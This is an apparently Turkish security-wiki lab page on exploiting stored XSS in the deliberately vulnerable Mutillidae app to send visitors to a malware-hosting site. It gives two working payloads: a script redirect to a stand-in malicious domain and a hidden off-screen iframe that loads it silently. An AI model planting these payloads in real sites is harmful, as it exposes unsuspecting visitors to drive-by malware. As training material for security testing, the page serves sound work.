Stored XSS Kullanarak Zararlı Yazılım Barındıran Sayfaya Yönlendirme

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara


Amaç:

Stored XSS zafiyetini istismar ederek, zafiyetin bulunduğu sayfayı ziyaret eden tüm kullanıcıları, zararlı yazılım barındıran bir adrese yönlendirmek.

Araç:

  • Iceweasel

Lab senaryosu:

Mutillidae veya Stored XSS barındıran başka web uygulaması kurulu web sunucusu üzerinden stored XSS payloadı olarak,

<script>window.location="http://zararlısayfa.com"</script>

girilir ve sayfayı ziyaret eden kullanıcılar, doğrudan “zararlısayfa.com” adresine yönlendirilirler.

Eğer, kullanıcının bağlı olduğu sayfayı terk etmeden, dolayısıyla haberi olmadan, başka bir sayfaya bağlanması isteniyorsa, gizli iframe yöntemi kullanılabilir. Bu yöntemde de XSS payloadı olarak (XFS yani cross frame scripting de denilmektedir)

<iframe style="position:absolute;top:-9999px" src="http://zararlısayfa.com"/></iframe>

kullanılabilir. Test ortamında, payloadın çalıştığını doğrulamak için Mutillidae’nın “Persistent XSS” bölümünde, blog girdisi olarak girilir. Devamında bloglar listelenirken, tarayıcının durum çubuğunda (resimde sol altta) “zararlısayfa.com adresinden veri yükleniyor” gibi bir mesaj görünüyor olması gerekir.

Storedxss.png